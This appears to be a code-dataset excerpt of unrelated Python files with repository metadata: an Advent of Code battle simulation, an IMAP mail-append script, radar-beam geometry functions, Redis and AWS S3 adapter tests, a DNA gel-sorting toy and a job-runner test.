infectionArmyUnits = sum(g.units for g in infectionArmy)
# Main battle round
while immuneArmyUnits > 0 and infectionArmyUnits > 0:
# Remove dead groups
effAndInit = lambda x: (x.getEffectivePower(), x.initiative)
immuneArmy = sorted(g for g in immuneArmy if g.alive, key=effAndInit, reverse=True)
infectionArmy = sorted(g for g in infectionArmy if g.alive, key=effAndInit, reverse=True)
getTargets(immuneArmy, infectionArmy)
getTargets(infectionArmy, immuneArmy)
kills = 0
allArmies = sorted(immuneArmy+infectionArmy, key=lambda x: x.initiative, reverse=True)
for army in allArmies:
if army.alive: # Only alive groups can attack, will be removed in the next round
kills += army.attack()
if kills == 0: # No kills in round = tie, would result in endless rounds
return None, None
immuneArmyUnits = sum(g.units for g in immuneArmy)
infectionArmyUnits = sum(g.units for g in infectionArmy)
return immuneArmyUnits, infectionArmyUnits
class Group:
def __init__(self, raw):
rawSplit = raw.split()
self.units = int(rawSplit[0])
self.hp = int(rawSplit[4])
self.immunities = []
self.weaknesses = []
if rawSplit[7].startswith("("):
weaksAndImmunes = raw.split("(")[1].split(")")[0].split("; ")
for wai in weaksAndImmunes:
if wai.startswith("weak"): self.weaknesses = wai[8:].split(", ")
elif wai.startswith("immune"): self.immunities = wai[10:].split(", ")
self.dmgAmt = int(rawSplit[-6])
self.dmgType = rawSplit[-5]
self.initiative = int(rawSplit[-1])
self.alive = True
self.target = None
def calcDmgTaken(self, attacker):
dmgAmtMult = 1
if attacker.dmgType in self.immunities: dmgAmtMult = 0
if attacker.dmgType in self.weaknesses: dmgAmtMult = 2
return attacker.getEffectivePower() * dmgAmtMult
def receiveAttack(self, attacker):
dmgAmt = self.calcDmgTaken(attacker)
unitsLost = dmgAmt // self.hp
if unitsLost > self.units: unitsLost = self.units
self.units -= unitsLost
if self.units <= 0:
self.alive = False
return unitsLost
def attack(self):
unitsLost = 0
if self.target:
unitsLost = self.target.receiveAttack(self)
self.target = None
return unitsLost
def getEffectivePower(self):
return self.units * self.dmgAmt
# def __repr__(self):
# return "U:{}, HP:{}, IMM:{}, WKN:{}, DMG:{}({}), EP:{}, INI:{}".format(
# self.units, self.hp, self.immunities, self.weaknesses,
# self.dmgAmt, self.dmgType, self.getEffectivePower(), self.initiative)
################################################
rawInput = [s for s in AOCUtils.loadInput(24) if s]
immuneStart, infectionStart = 0, rawInput.index("Infection:")
rawImmune = rawInput[immuneStart+1:infectionStart]
rawInfection = rawInput[infectionStart+1:]
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection)
print("Part 1: {}".format(max(immuneArmyUnits, infectionArmyUnits)))
boostLo, boostHi = 0, 1000 # Binary Search
while boostLo != boostHi:
boost = (boostLo + boostHi) // 2
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection, boost)
if immuneArmyUnits is None or immuneArmyUnits == 0: # Tie or loss
boostLo = boost + 1
else:
boostHi = boost
immuneArmyUnits, infectionArmyUnits = battle(rawImmune, rawInfection, boost)
print("Part 2: {}".format(immuneArmyUnits))
AOCUtils.printTimeTaken()
| 34.659722 | 116 | 0.60569 | 528 | 4,991 | 5.710227 | 0.278409 | 0.009287 | 0.01393 | 0.021227 | 0.182421 | 0.121393 | 0.078275 | 0.057048 | 0.057048 | 0.057048 | 0 | 0.012768 | 0.262472 | 4,991 | 144 | 117 | 34.659722 | 0.806303 | 0.113404 | 0 | 0.126316 | 0 | 0 | 0.011483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010526 | null | null | 0.031579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
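The boost loop above is a lower-bound binary search over a monotonic win/lose predicate; the same skeleton in isolation (the predicate here is just a stand-in):

```python
def smallest_passing(lo, hi, passes):
    """Return the smallest value in [lo, hi] for which passes() is True,
    assuming passes is monotonic (False ... False, True ... True)."""
    while lo != hi:
        mid = (lo + hi) // 2
        if passes(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo

assert smallest_passing(0, 1000, lambda b: b >= 137) == 137
```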
eae24d8c828bb6bb378412becf7ee1a02837535c | 1,279 | py | Python | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | Imap_append.py | satheesheppalapelli/imap | 064ce69f9fdd63e3f7fbf402ef383c38b31fea14 | [
"MIT"
] | null | null | null | import imaplib
import email
from email import message
import time
username = 'gmail_id'
password = 'gmail_password'
new_message = email.message.Message()
new_message.set_unixfrom('satheesh')
new_message['Subject'] = 'Sample Message'
# from gmail id
new_message['From'] = 'eppalapellisatheesh1@gmail.com'
# to gmail id
new_message['To'] = 'eppalapellisatheesh1@gmail.com'
# message data
new_message.set_payload('This is the body of the message.\n')
# print(new_message)
# you want to connect to a server; specify which server and port
# server = imaplib.IMAP4('server', 'port')
server = imaplib.IMAP4_SSL('imap.googlemail.com')
# after connecting, tell the server who you are to login to gmail
# server.login('user', 'password')
server.login(username, password)
# this will show you a list of available folders
# possibly your Inbox is called INBOX, but check the list of mailboxes
response, mailboxes = server.list()
if response == 'OK':
response, data = server.select("Inbox")
response = server.append('INBOX', '', imaplib.Time2Internaldate(time.time()), str(new_message).encode('utf-8'))
# print(response)
if response[0] == 'OK':
print("Gmail Appended Successfully")
else:
print("Not Appended")
server.close()
server.logout()
| 32.794872 | 115 | 0.723221 | 175 | 1,279 | 5.211429 | 0.44 | 0.087719 | 0.028509 | 0.037281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006458 | 0.152463 | 1,279 | 38 | 116 | 33.657895 | 0.834871 | 0.305708 | 0 | 0 | 0 | 0 | 0.260274 | 0.068493 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.083333 | 0.166667 | 0 | 0.166667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eae5610490f4bff538d28053548c7a7377626c1f | 4,362 | py | Python | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2011-2019, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Miscellaneous
^^^^^^^^^^^^^
.. autosummary::
:nosignatures:
:toctree: generated/
bin_altitude
bin_distance
site_distance
"""
import numpy as np
def bin_altitude(r, theta, sitealt, re, ke=4./3.):
"""Calculates the height of a radar bin taking the refractivity of the \
atmosphere into account.
Based on :cite:`Doviak1993` the bin altitude is calculated as
.. math::
h = \\sqrt{r^2 + (k_e r_e)^2 + 2 r k_e r_e \\sin\\theta} - k_e r_e
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
sitealt : float
Altitude in [m] a.s.l. of the referencing radar site
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
altitude : :class:`numpy:numpy.ndarray`
Array of heights of the radar bins in [m]
"""
reff = ke * re
sr = reff + sitealt
return np.sqrt(r ** 2 + sr ** 2 +
2 * r * sr * np.sin(np.radians(theta))) - reff
def bin_distance(r, theta, sitealt, re, ke=4./3.):
"""Calculates great circle distance from radar site to radar bin over \
spherical earth, taking the refractivity of the atmosphere into account.
.. math::
s = k_e r_e \\arctan\\left(
\\frac{r \\cos\\theta}{r \\cos\\theta + k_e r_e + h}\\right)
where :math:`h` would be the radar site altitude amsl.
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
sitealt : float
site altitude [m] amsl.
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
distance : :class:`numpy:numpy.ndarray`
Array of great circle arc distances [m]
"""
reff = ke * re
sr = reff + sitealt
theta = np.radians(theta)
return reff * np.arctan(r * np.cos(theta) / (r * np.sin(theta) + sr))
def site_distance(r, theta, binalt, re=None, ke=4./3.):
"""Calculates great circle distance from bin at certain altitude to the \
radar site over spherical earth, taking the refractivity of the \
atmosphere into account.
Based on :cite:`Doviak1993` the site distance may be calculated as
.. math::
s = k_e r_e \\arcsin\\left(
\\frac{r \\cos\\theta}{k_e r_e + h_n(r, \\theta, r_e, k_e)}\\right)
where :math:`h_n` would be provided by
:func:`~wradlib.georef.misc.bin_altitude`.
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
binalt : :class:`numpy:numpy.ndarray`
site altitude [m] amsl. same shape as r.
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
distance : :class:`numpy:numpy.ndarray`
Array of great circle arc distances [m]
"""
reff = ke * re
return reff * np.arcsin(r * np.cos(np.radians(theta)) / (reff + binalt))
| 31.381295 | 77 | 0.631133 | 622 | 4,362 | 4.395498 | 0.23955 | 0.036576 | 0.054865 | 0.080468 | 0.686174 | 0.673738 | 0.656547 | 0.643745 | 0.590344 | 0.590344 | 0 | 0.013669 | 0.262036 | 4,362 | 138 | 78 | 31.608696 | 0.833799 | 0.781293 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eae8b1571de983e30e5b62cbb49111d3bbe371a5 | 3,773 | py | Python | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | null | null | null | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | null | null | null | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | 1 | 2021-07-30T06:01:20.000Z | 2021-07-30T06:01:20.000Z | import os
import pytest
import fakeredis
from db_transfer.adapter_redis import Redis
from db_transfer.transfer import Transfer, sent_env
@pytest.fixture()
def fake_redis(monkeypatch):
fake_redis = lambda *args, **kwargs: fakeredis.FakeStrictRedis(decode_responses=True)
monkeypatch.setattr(Redis, 'connect', fake_redis)
#fake_redis().flushall()
return fake_redis
@pytest.fixture()
def redis_transfer(fake_redis):
os.environ['test_host_1'] = 'localhost'
os.environ['test_port_1'] = '6379'
os.environ['test_db_1'] = '0'
@sent_env('redis', 'HOST', 'test_host_1')
@sent_env('redis', 'PORT', 'test_port_1')
@sent_env('redis', 'DB', 'test_db_1')
class TestHandlerRedis_1(Transfer):
pass
redis_transfer = TestHandlerRedis_1(namespace='namespace_1', adapter_name='redis')
return redis_transfer
def test_redis_string(redis_transfer):
redis_transfer['key_1'] = 'value'
redis_transfer['key_2:key_3'] = 'value'
with redis_transfer:
redis_transfer['key_4'] = 'value'
redis_transfer['key_2:key_5'] = 'value'
assert str(redis_transfer['key_1']) == 'value'
assert str(redis_transfer['key_2:key_3']) == 'value'
assert str(redis_transfer['key_4']) == 'value'
assert str(redis_transfer['key_2:key_5']) == 'value'
def test_redis_list(redis_transfer):
redis_transfer['key_6:key_7'] = ['list_element_1', 'list_element_2']
with redis_transfer:
redis_transfer['key_8:key_9'] = [['list_element_1', 'list_element_2']]
redis_transfer['key_10'] = [{'key': 'value', 'foo': 'bar'}, {'key': 'value'}]
assert list(redis_transfer['key_6:key_7']) == ['list_element_1', 'list_element_2']
assert list(redis_transfer['key_8:key_9']) == [['list_element_1', 'list_element_2']]
assert list(redis_transfer['key_10']) == [{'key': 'value', 'foo': 'bar'}, {'key': 'value'}]
def test_redis_set(redis_transfer):
redis_transfer['key_11:key_12'] = set(['list_element_1', 'list_element_2'])
assert set(redis_transfer['key_11:key_12']) == {'list_element_1', 'list_element_2'}
def test_redis_hash(redis_transfer):
test_dict = {'foo': 'bar', 'doo': {'goo': 'gar'}, 'zoo': [1, 2, 3, {'foo': 'bar'}]}
redis_transfer['hash_key'] = test_dict
assert dict(redis_transfer['hash_key']) == test_dict
assert redis_transfer['hash_key']['foo'] == test_dict['foo']
assert redis_transfer['hash_key']['doo'] == test_dict['doo']
assert redis_transfer['hash_key']['zoo'] == test_dict['zoo']
for key, value in redis_transfer['hash_key']:
assert test_dict[key] == value
def test_redis_hash_iterator(redis_transfer):
test_dict = {'foo': 'bar', 'doo': {'goo': 'gar'}, 'zoo': [1, 2, 3, {'foo': 'bar'}]}
redis_transfer['hash_key'] = test_dict
for key, value in iter(redis_transfer['hash_key']):
assert test_dict[key] == value
def test_redis_delete(redis_transfer):
redis_transfer['some_key_1'] = 'some_value'
assert str(redis_transfer['some_key_1']) == 'some_value'
del redis_transfer['some_key_1']
assert redis_transfer['some_key_1'] is None
def test_redis_keys(redis_transfer):
assert redis_transfer.keys() == ['hash_key', 'key_1', 'key_10',
'key_11:key_12', 'key_2:key_3',
'key_2:key_5', 'key_4', 'key_6:key_7',
'key_8:key_9']
assert redis_transfer['key_2'].keys() == ['key_2:key_3', 'key_2:key_5']
del redis_transfer['key_2:key_3']
del redis_transfer['key_2:key_5']
assert redis_transfer.keys() == ['hash_key', 'key_1', 'key_10',
'key_11:key_12', 'key_4', 'key_6:key_7',
'key_8:key_9']
| 34.935185 | 95 | 0.642725 | 533 | 3,773 | 4.172608 | 0.144465 | 0.26304 | 0.136691 | 0.071942 | 0.631295 | 0.539568 | 0.43705 | 0.34982 | 0.306205 | 0.306205 | 0 | 0.03437 | 0.1903 | 3,773 | 107 | 96 | 35.261682 | 0.693617 | 0.006096 | 0 | 0.191781 | 0 | 0 | 0.240331 | 0 | 0 | 0 | 0 | 0 | 0.260274 | 1 | 0.123288 | false | 0.013699 | 0.068493 | 0 | 0.232877 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaf3f83969eefc20c915399632dfbe8f86dda3dd | 8,087 | py | Python | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 296 | 2020-03-16T19:55:00.000Z | 2022-01-10T19:46:05.000Z | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 57 | 2020-03-17T11:15:57.000Z | 2021-07-10T14:42:27.000Z | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 38 | 2020-03-17T21:06:05.000Z | 2022-02-08T03:19:34.000Z |
import unittest
from mock import Mock

from foundations_spec import *
from foundations_aws.aws_bucket import AWSBucket


class TestAWSBucket(Spec):

    class MockListing(object):

        def __init__(self, bucket, files):
            self._bucket = bucket
            self._files = files

        def __call__(self, Bucket, Prefix, Delimiter):
            if Bucket != self._bucket:
                return {}
            return {
                'Contents': [{'Key': Prefix + key} for key in self._grouped_and_prefixed_files(Prefix, Delimiter)],
                'CommonPrefixes': [{'Prefix': Prefix + new_prefix} for new_prefix in self._unique_delimited_prefixes(Prefix, Delimiter)]
            }

        def _unique_delimited_prefixes(self, prefix, delimiter):
            items = set()
            # below is done to preserve order
            for key in self._prefixes(prefix, delimiter):
                if key not in items:
                    items.add(key)
                    yield key

        def _prefixes(self, prefix, delimiter):
            for key in self._prefixed_files(prefix):
                if delimiter in key:
                    yield key.split(delimiter)[0]

        def _grouped_and_prefixed_files(self, prefix, delimiter):
            for key in self._prefixed_files(prefix):
                if delimiter not in key:
                    yield key

        def _prefixed_files(self, prefix):
            prefix_length = len(prefix)
            for key in self._files:
                if key.startswith(prefix):
                    yield key[prefix_length:]

    connection_manager = let_patch_mock(
        'foundations_aws.global_state.connection_manager'
    )
    connection = let_mock()
    mock_file = let_mock()

    @let
    def file_name(self):
        return self.faker.name()

    @let
    def data(self):
        return self.faker.sha256()

    @let
    def data_body(self):
        mock = Mock()
        mock.read.return_value = self.data
        mock.iter_chunks.return_value = [self.data]
        return mock

    @let
    def bucket_prefix(self):
        return self.faker.name()

    @let
    def bucket_postfix(self):
        return self.faker.uri_path()

    @let
    def bucket_name_with_slashes(self):
        return self.bucket_prefix + '/' + self.bucket_postfix

    @let
    def upload_file_name_with_slashes(self):
        return self.bucket_postfix + '/' + self.file_name

    @let
    def bucket(self):
        return AWSBucket(self.bucket_path)

    @let
    def bucket_with_slashes(self):
        return AWSBucket(self.bucket_name_with_slashes)

    @let
    def bucket_path(self):
        return 'testing-bucket'

    @let
    def source_path(self):
        return self.faker.name()

    @let
    def source_path_with_slashes(self):
        return self.bucket_postfix + '/' + self.source_path

    @set_up
    def set_up(self):
        self.connection_manager.bucket_connection.return_value = self.connection

    def test_upload_from_string_uploads_data_to_bucket_with_prefix(self):
        self.bucket_with_slashes.upload_from_string(self.file_name, self.data)
        self.connection.put_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes, Body=self.data)

    def test_exists_returns_true_when_file_exists_with_prefix(self):
        self.bucket_with_slashes.exists(self.file_name)
        self.connection.head_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)

    def test_download_as_string_uploads_data_to_bucket_with_prefix(self):
        self.connection.get_object = ConditionalReturn()
        self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
        result = self.bucket_with_slashes.download_as_string(self.file_name)
        self.assertEqual(self.data, result)

    def test_download_to_file_uploads_data_to_bucket_with_prefix(self):
        self.connection.get_object = ConditionalReturn()
        self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
        result = self.bucket_with_slashes.download_to_file(self.file_name, self.mock_file)
        self.mock_file.write.assert_called_with(self.data)

    def test_remove_removes_prefixed_files(self):
        self.bucket_with_slashes.remove(self.file_name)
        self.connection.delete_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)

    def test_move_moves_prefixed_files(self):
        self.bucket_with_slashes.move(self.source_path, self.file_name)
        source_info = {'Bucket': self.bucket_prefix, 'Key': self.source_path_with_slashes}
        self.connection.copy_object.assert_called_with(Bucket=self.bucket_prefix, CopySource=source_info, Key=self.upload_file_name_with_slashes)

    def test_list_files_returns_empty(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            []
        )
        self.assertEqual([], self._fetch_listing('*'))

    def test_list_files_returns_all_results(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log']
        )
        self.assertEqual(['my.txt', 'scheduler.log'], self._fetch_listing('*'))

    def test_list_files_returns_file_type_filter(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log']
        )
        self.assertEqual(['my.txt'], self._fetch_listing('*.txt'))

    def test_list_files_returns_all_results_dot_directory(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log']
        )
        self.assertEqual(['my.txt', 'scheduler.log'],
                         self._fetch_listing('./*'))

    def test_list_files_returns_file_type_filter_dot_directory(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log']
        )
        self.assertEqual(['my.txt'], self._fetch_listing('./*.txt'))

    def test_list_files_returns_only_local_directory(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log', 'path/to/some/other/files']
        )
        self.assertEqual(['my.txt', 'scheduler.log', 'path'], self._fetch_listing('*'))

    def test_list_files_returns_only_sub_directory(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['my.txt', 'scheduler.log', 'path/to/some/other/files']
        )
        self.assertEqual(['path/to/some/other/files'], self._fetch_listing('path/to/some/other/*'))

    def test_list_files_returns_folder_within_sub_directory(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['path/to/some/other/files']
        )
        self.assertEqual(['path/to'], self._fetch_listing('path/*'))

    def test_list_files_returns_arbitrary_filter(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_path,
            ['some_stuff_here', 'no_stuff_there', 'some_more_stuff_here']
        )
        self.assertEqual(['some_stuff_here', 'some_more_stuff_here'], self._fetch_listing('some_*_here'))

    def test_list_files_supports_prefixes(self):
        self.connection.list_objects_v2.side_effect = self.MockListing(
            self.bucket_prefix,
            [self.upload_file_name_with_slashes]
        )
        result = list(self.bucket_with_slashes.list_files('*'))
        self.assertEqual([self.file_name], result)

    def _fetch_listing(self, pathname):
        generator = self.bucket.list_files(pathname)
        return list(generator)
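
The `MockListing` helper above emulates how S3's `list_objects_v2` splits keys into direct `Contents` entries and delimiter-grouped `CommonPrefixes`. A minimal standalone sketch of that grouping rule (hypothetical helper name, not part of the original test suite):

```python
def split_by_delimiter(files, delimiter='/'):
    """Mimic an S3-style listing: plain keys vs. first-level common prefixes."""
    contents = [key for key in files if delimiter not in key]
    prefixes = []
    for key in files:
        if delimiter in key:
            prefix = key.split(delimiter)[0]
            if prefix not in prefixes:  # preserve first-seen order, like the mock
                prefixes.append(prefix)
    return contents, prefixes

listing = split_by_delimiter(['my.txt', 'scheduler.log', 'path/to/some/other/files'])
# listing == (['my.txt', 'scheduler.log'], ['path'])
```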
| 37.267281 | 145 | 0.66712 | 1,002 | 8,087 | 5.028942 | 0.134731 | 0.069458 | 0.046438 | 0.031752 | 0.608454 | 0.538797 | 0.524509 | 0.463187 | 0.422306 | 0.395515 | 0 | 0.002251 | 0.230988 | 8,087 | 216 | 146 | 37.439815 | 0.808008 | 0.003833 | 0 | 0.282353 | 0 | 0 | 0.067304 | 0.017757 | 0 | 0 | 0 | 0 | 0.094118 | 1 | 0.211765 | false | 0 | 0.023529 | 0.064706 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaf751a9a0bcab3d9157ea5ae5ba0acfa2a5324c | 1,413 | py | Python | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | from molecules.dna_molecule import DNAMolecule
from molecules.dna_sequence import DNASequence


class GelElectrophoresis:
    """
    Produce the Gel Electrophoresis procedure to sort DNA molecules by their size.
    """

    @staticmethod
    def run_gel(dna_molecules):
        """
        Runs the Gel Electrophoresis procedure to sort DNA molecules by their size.

        :param dna_molecules: DNA molecules.
        :return: Sorted list of the DNA molecules given.
        """
        molecules = list(dna_molecules)
        molecules.sort(key=lambda mol: mol.length)
        return molecules


if __name__ == '__main__':
    dna_sequences = [
        DNASequence.create_random_sequence(size=20),
        DNASequence.create_random_sequence(size=10),
        DNASequence.create_random_sequence(size=30),
        DNASequence.create_random_sequence(size=5),
        DNASequence.create_random_sequence(size=15)
    ]

    ex_dna_molecules = [
        DNAMolecule(dna_sequences[index], dna_sequences[index].get_complement())
        for index in range(len(dna_sequences))
    ]

    print('DNA molecules:')
    for molecule in ex_dna_molecules:
        print(f'{molecule}\n')

    print('\nRun Gel Electrophoresis on DNA molecules:')
    gel_dna_molecules = GelElectrophoresis.run_gel(ex_dna_molecules)
    print('Results DNA molecules:')
    for molecule in gel_dna_molecules:
        print(f'{molecule}\n')
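
Since `run_gel` relies only on each molecule exposing a `length` attribute, its sorting behaviour can be sketched without the real `DNAMolecule` class (the stand-in type below is hypothetical):

```python
class FakeMolecule:
    """Stand-in exposing only the `length` attribute that run_gel uses."""
    def __init__(self, length):
        self.length = length


def run_gel_sketch(dna_molecules):
    # Same logic as GelElectrophoresis.run_gel: a stable sort by molecule length
    molecules = list(dna_molecules)
    molecules.sort(key=lambda mol: mol.length)
    return molecules


lengths = [m.length for m in run_gel_sketch(FakeMolecule(n) for n in (20, 10, 30, 5, 15))]
# lengths == [5, 10, 15, 20, 30]
```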
| 28.836735 | 83 | 0.690729 | 167 | 1,413 | 5.60479 | 0.353293 | 0.192308 | 0.122863 | 0.165598 | 0.424145 | 0.183761 | 0.126068 | 0.126068 | 0.126068 | 0.126068 | 0 | 0.008204 | 0.223638 | 1,413 | 48 | 84 | 29.4375 | 0.845032 | 0.170559 | 0 | 0.071429 | 0 | 0 | 0.099552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.178571 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d80aded943ac31da1cf1d442bfacdc0c574d184b | 583 | py | Python | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | 13 | 2018-03-10T23:32:16.000Z | 2019-09-10T14:20:46.000Z | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | null | null | null | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | 1 | 2018-12-12T22:17:51.000Z | 2018-12-12T22:17:51.000Z | from unittest import TestCase
from logger import get_logger
from config import get_config
from .runner import JobsRunner

logger = get_logger(__name__, log_level=("TEST", "LOGLEVEL"))
config = get_config()


def test_run(self, config, job_config, date):
    print("Running test job")


class JobRunnerTests(TestCase):

    def setUp(self):
        self.runner = JobsRunner(config)
        self.runner.run_loop()

    def tearDown(self):
        self.runner.stop_loop()

    def testAddJob(self):
        self.runner.add_job("test_job", "jobs.tests.test_run", {"schedule_at": "01:00"})
| 25.347826 | 88 | 0.703259 | 79 | 583 | 4.974684 | 0.443038 | 0.101781 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0.176672 | 583 | 22 | 89 | 26.5 | 0.810417 | 0 | 0 | 0 | 0 | 0 | 0.121784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5625 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d80ea4320731a7f5c8a15b5c673de800b94a36ed | 463 | py | Python | underscore/declaration.py | doboy/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
] | 7 | 2016-09-23T00:44:05.000Z | 2021-10-04T21:19:12.000Z | underscore/declaration.py | jameswu1991/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
